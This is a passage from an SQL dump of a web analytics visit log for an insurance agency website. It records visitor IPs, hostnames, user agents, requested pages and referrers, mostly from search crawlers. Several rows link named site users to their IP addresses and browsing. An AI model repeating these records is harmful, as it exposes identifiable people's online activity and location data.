1080','','','','roisy','','0','51',0),(27177,'0b_4a5262518bbe71f43d6892a39ddaa561','1462827368','173.220.14.107','ool-addc0e6b.static.optonline.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 50','us','1920 x 1080','Google','','','','','0','0',0),(27179,'0b_4a5262518bbe71f43d6892a39ddaa561','1462827410','173.220.14.107','ool-addc0e6b.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/meet-the-eib-team/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27180,'0b_4a5262518bbe71f43d6892a39ddaa561','1462827411','173.220.14.107','ool-addc0e6b.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27182,'0b_992539174ed58782cad2ba76b819fca6','1462828483','69.164.140.246','69.164.140.246.xchangetele.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','zenwirth','','0','0',0),(27185,'0b_992539174ed58782cad2ba76b819fca6','1462828484','69.164.140.246','69.164.140.246.xchangetele.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','zenwirth','','0','0',0),(27188,'0b_6734028faf9c0a77ba313427dd7d06ed','1462829314','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','ykaufman','','0','0',0),(27191,'0b_6734028faf9c0a77ba313427dd7d06ed','1462829326','50.108.153.152','50.108.153.152','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','ykaufman','','0','0',0),(27192,'0b_6734028faf9c0a77ba313427dd7d06ed','1462829466','50.108.153.152','50.108.153.152','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','ykaufman','','0','0',0),(27195,'0b_cac8aa1ca91fc6ae4a26a297268b1f40','1462829948','66.249.66.24','crawl-66-249-66-24.googlebot.com','/forms/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27197,'0b_137fa85fd82be4a19d756b54ad81fc00','1462830415','151.80.31.178','photon028.ahrefs.com','/robots.txt','Mozilla/5.0 (compatible; AhrefsBot/5.1; +http://ahrefs.com/robot/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(27198,'0b_e2c33bbcfc7de1370824332b077e4590','1462831259','79.143.180.15','mail.ruddog.eu','/','Wget/1.13.4 (linux-gnu)','','',0,'','Wget 1','eu','','','Wget','','','','0','0',0),(27200,'0b_276dbe505add3da5ebe84032dda7d09d','1462831260','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(27201,'0b_8a3226529d4d6453f8023246932c52a5','1462834256','66.249.66.40','crawl-66-249-66-40.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27203,'0b_8a3226529d4d6453f8023246932c52a5','1462834258','66.249.66.34','crawl-66-249-66-34.googlebot.com','/.well-known/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27204,'0b_8a3226529d4d6453f8023246932c52a5','1462834259','66.249.66.34','crawl-66-249-66-34.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27207,'0b_0a82985221a0659202a69452b8e6231e','1462834878','207.46.13.144','msnbot-207-46-13-144.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(27209,'0b_1c15e2778c5f7629a4af9b5e26f30558','1462836237','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:2.0b10) Gecko/20110126 Firefox/4.0b10','','',0,'Win7','Firefox 4','us','','','','','','','0','0',0),(27212,'0b_7d9e737d22a048f67c729bcb7f5fb2b5','1462836433','188.40.95.70','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(27215,'0b_7d9e737d22a048f67c729bcb7f5fb2b5','1462836435','188.40.95.70','majestic12.co.uk','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(27218,'0b_15f3e3efd093b92fd1bd4b4a60f6514e','1462836455','46.229.167.149','46.229.167.149','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:2.0b8) Gecko/20100101 Firefox/4.0b8','','',0,'MacOSX','Firefox 4','','','','','','','','0','0',0),(27219,'0b_d617b62f1c6b4b9850fc84d08aba3671','1462837918','100.43.81.146','spider-100-43-81-146.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(27222,'0b_e8853240146de4b8439102ca60aeede6','1462837920','141.8.143.242','spider-141-8-143-242.yandex.com','/case-status/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(27224,'0b_4ee8059fbd95054e5e42f7892c2fc8eb','1462840086','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27225,'0b_da1861007d1db92a1f18bebbd454c082','1462841542','37.115.184.150','37-115-184-150-broadband.kyivstar.net','/','Mozilla/4.79 [en] (Windows NT 5.0; U)','http://www.all4invest.ru/','',0,'Win2000','Netscape 4','','','','','','','','0','0',0),(27228,'0b_a5eaae98d625a3735cee90935cac8097','1462841600','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27230,'0b_7fb10893eaf3089594eb386130e97958','1462841925','180.76.15.18','baiduspider-180-76-15-18.crawl.baidu.com','/contact/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(27233,'0b_a41d44a6bdc2c570c02668ca335eeaf0','1462844437','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27234,'0b_9c5df9f9b159fad1a5ef215d4f04380c','1462844516','178.137.83.178','178-137-83-178-lvv.broadband.kyivstar.net','/','Mozilla/4.0 (compatible; MSIE 5.01; Windows 95; MSIECrawler)','http://oils.afora.ru/','',0,'Win95','IE 5','','','','','','','','0','0',0),(27237,'0b_29d6c321b3bf07e1a30ef09a8d2f7aa1','1462845073','180.76.15.25','baiduspider-180-76-15-25.crawl.baidu.com','/robots.txt','Mozilla/5.0 (Windows NT 5.1; rv:6.0.2) Gecko/20100101 Firefox/6.0.2','','',0,'WinXP','Firefox 6','cn','','','Baiduspider','','','','0','0',0),(27240,'0b_d9cb3da933584480f2c28b97924bfb92','1462845319','180.76.15.30','baiduspider-180-76-15-30.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(27242,'0b_c82503e6eaf6858ad10acc32b6fd4e06','1462846456','180.76.15.18','baiduspider-180-76-15-18.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(27245,'0b_7ff0758ea6dc9c12abde5e8ceaff25ba','1462847611','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27246,'0b_7ff0758ea6dc9c12abde5e8ceaff25ba','1462847612','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27248,'0b_fb81eacb4c7195261e2b7cb9f1e9297a','1462849997','141.8.143.235','spider-141-8-143-235.yandex.com','/forms/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(27251,'0b_099c9fba3ebef650d372d375cdecf32e','1462854863','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(27252,'0b_6ad76167e6b7844b57ce754e1ffb53bf','1462854951','207.210.239.211','207-210-239-211-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(27254,'0b_b93285a6ad3aae91c07c8665badc6f3a','1462855277','107.172.224.24','107-172-224-24-host.colocrossing.com','/guruwritingservice-com-examination-trustworthy-firm-to-get-any-paper-readily-and-timely/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com/','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(27255,'0b_b93285a6ad3aae91c07c8665badc6f3a','1462855279','107.172.224.24','107-172-224-24-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','http://www.empireins.com','',0,'Win8','Google Chrome','us','','','','','','','0','0',0),(27257,'0b_7c4702d309a987ed663a16b618acb8c6','1462856025','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27258,'0b_7c4702d309a987ed663a16b618acb8c6','1462856025','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27261,'0b_7c4702d309a987ed663a16b618acb8c6','1462856027','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27264,'0b_7c4702d309a987ed663a16b618acb8c6','1462856032','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','','','0','0',0),(27267,'0b_7c4702d309a987ed663a16b618acb8c6','1462856095','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27269,'0b_7c4702d309a987ed663a16b618acb8c6','1462856387','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27270,'0b_7c4702d309a987ed663a16b618acb8c6','1462856449','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27273,'0b_7c4702d309a987ed663a16b618acb8c6','1462856505','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/underwriting-cheat-sheets/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27275,'0b_7c4702d309a987ed663a16b618acb8c6','1462856515','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/underwriting-cheat-sheets/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27278,'0b_7c4702d309a987ed663a16b618acb8c6','1462856524','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/life-product-search/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/carriers/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27279,'0b_7c4702d309a987ed663a16b618acb8c6','1462856620','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27281,'0b_7c4702d309a987ed663a16b618acb8c6','1462856621','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/life-product-search/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27282,'0b_d329c6cf42b38a24049a3127608e21d4','1462856717','141.8.143.235','spider-141-8-143-235.yandex.com','/contact/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(27285,'0b_7c4702d309a987ed663a16b618acb8c6','1462857566','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27288,'0b_7c4702d309a987ed663a16b618acb8c6','1462857566','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27291,'0b_7c4702d309a987ed663a16b618acb8c6','1462857567','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','0',0),(27293,'0b_7c4702d309a987ed663a16b618acb8c6','1462857572','47.17.234.126','ool-2f11ea7e.dyn.optonline.net','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 50','us','1920 x 1080','','','','Sgrunstein','','0','51',0),(27294,'0b_64db63021b1bb5a00b62848ec1f31bd3','1462857912','52.73.200.208','ec2-52-73-200-208.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:2.0b8pre) Gecko/20101114 Firefox/4.0b8pr','','',0,'Win7 x64','Firefox 4','','','','','','','','0','0',0),(27297,'0b_967edf19697c6688a4bd764b333a6fb2','1462858550','151.147.235.16','151.147.235.16','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=Empire%20Insurance%20Services%20australia&qs=n&form=QBRE&pq=empire%20insurance%20services%20australia&sc=0-35&sp=-1&sk=&cvid=B0E71BF414EA439097565F21A5EF4F21','Empire Insurance Services australia',1,'Win7 x64','IE 11','au','','Bing','','','','','0','0',0),(27299,'0b_967edf19697c6688a4bd764b333a6fb2','1462858550','151.147.235.16','151.147.235.16','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=Empire%20Insurance%20Services%20australia&qs=n&form=QBRE&pq=empire%20insurance%20services%20australia&sc=0-35&sp=-1&sk=&cvid=B0E71BF414EA439097565F21A5EF4F21','Empire Insurance Services australia',1,'Win7 x64','IE 11','au','','Bing','','','','','0','0',0),(27302,'0b_967edf19697c6688a4bd764b333a6fb2','1462858583','151.147.235.16','151.147.235.16','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','au','','','','','','','0','0',0),(27303,'0b_89b299d4bf1536169b98349eb961dde5','1462862463','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27306,'0b_2e5e75e7d855257ee5d02b1d1fb8b2cd','1462863164','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27308,'0b_08db71905cfb0886465c709082b78d17','1462865599','141.8.143.235','spider-141-8-143-235.yandex.com','/carriers/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(27309,'0b_936039be41d9d5232bfe6f9af35273c3','1462865790','66.249.66.21','crawl-66-249-66-21.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27312,'0b_936039be41d9d5232bfe6f9af35273c3','1462865790','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'Android','','','','','Googlebot-Mobile','','','','0','0',0),(27315,'0b_1211c12d08531de6b937afab4d20c2af','1462865985','54.211.65.153','ec2-54-211-65-153.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; rv:20.0) Gecko/20100101 Firefox/20.0','','',0,'Win7','Firefox 20','','','','','','','','0','0',0),(27318,'0b_612438fb79d9ac5ae45e62d22e9098c1','1462865992','54.211.65.153','ec2-54-211-65-153.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','','',0,'WinXP','Firefox 22','us','','','','','','','0','0',0),(27320,'0b_612438fb79d9ac5ae45e62d22e9098c1','1462865993','54.211.65.153','ec2-54-211-65-153.compute-1.amazonaws.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 5.1; rv:22.0) Gecko/20100101 Firefox/22.0','http://www.empireins.com/','',0,'WinXP','Firefox 22','us','','','','','','','0','0',0),(27323,'0b_33c32dd29c6c2e56e4bfb3d476823935','1462866185','216.244.79.218','hosted.at.admixhosting.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(27326,'0b_7e5b361bd8b0f5c46cca97f82e591de9','1462866501','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27329,'0b_ad16177b338048c6db4160ec4668ebe2','1462867440','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27330,'0b_5dcb4fac2d1269967beabd2db9d0693d','1462871061','157.55.39.163','msnbot-157-55-39-163.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27333,'0b_5dcb4fac2d1269967beabd2db9d0693d','1462871067','157.55.39.163','msnbot-157-55-39-163.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27336,'0b_5a3f4388a302979abd5173e01b095893','1462871164','195.154.56.126','195-154-56-126.rev.poneytelecom.eu','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','eu','','','','','','','0','0',0),(27338,'0b_e6e7ebcb1ecb56712f096e8250016153','1462873320','103.30.93.27','ip-93-27.neuviz.net.id','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4','https://www.google.com.au/','_notprovided_',1,'iPhone OS','Safari 8 Mobile','id','375 x 667','Google AU','','','','','0','0',0),(27339,'0b_e6e7ebcb1ecb56712f096e8250016153','1462873324','103.30.93.27','ip-93-27.neuviz.net.id','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','Safari 8 Mobile','id','375 x 667','','','','','','0','0',0),(27341,'0b_e6e7ebcb1ecb56712f096e8250016153','1462873345','103.30.93.27','ip-93-27.neuviz.net.id','/contact/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4','http://www.empireins.com/','',0,'iPhone OS','Safari 8 Mobile','id','375 x 667','','','','','','0','0',0),(27342,'0b_508b636e97364811667d78ce416aaec6','1462875358','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27344,'0b_508b636e97364811667d78ce416aaec6','1462875365','40.77.167.94','msnbot-40-77-167-94.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27345,'0b_0976efda7edef40b7b36356e9ee17f11','1462879053','192.227.211.60','192-227-211-60-host.colocrossing.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 39','us','','','','','','','0','0',0),(27348,'0b_cb70bf05b7f05fd2f7931abffe18a923','1462880452','2.98.213.200','host-2-98-213-200.as13285.net','/','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','https://www.google.co.uk/','_notprovided_',1,'iPhone OS','Safari 9 Mobile','gb','','Google UK','','','','','0','0',0),(27350,'0b_cb70bf05b7f05fd2f7931abffe18a923','1462880455','2.98.213.200','host-2-98-213-200.as13285.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E238 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','gb','','','','','','','0','0',0),(27351,'0b_5e8aee2e86a89ba70ed587626b2fb705','1462880485','62.24.252.133','host-62-24-252-133.as13285.net','/robots.txt','Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; InfoPath.2)','http://www.empireins.com/robots.txt','',0,'WinXP','IE 8','','','','Unknown Spider','','','','0','0',0),(27354,'0b_5375ddcfff1424739988d739067b09cc','1462881372','207.46.13.124','msnbot-207-46-13-124.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(27356,'0b_77ff03c68d7c92a3c1796fc368f18183','1462885430','66.249.66.24','crawl-66-249-66-24.googlebot.com','/illustration.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27357,'0b_77ff03c68d7c92a3c1796fc368f18183','1462885749','66.249.66.21','crawl-66-249-66-21.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(27360,'0b_774f927e878918625ac344078d5f7cca','1462886024','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27362,'0b_774f927e878918625ac344078d5f7cca','1462886025','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 50','us','','','','','','','0','0',0),(27365,'0b_f7f3a2fc91fe51f34240f3c6686198e2','1462886063','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','','','0','0',0),(27366,'0b_f7f3a2fc91fe51f34240f3c6686198e2','1462886064','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 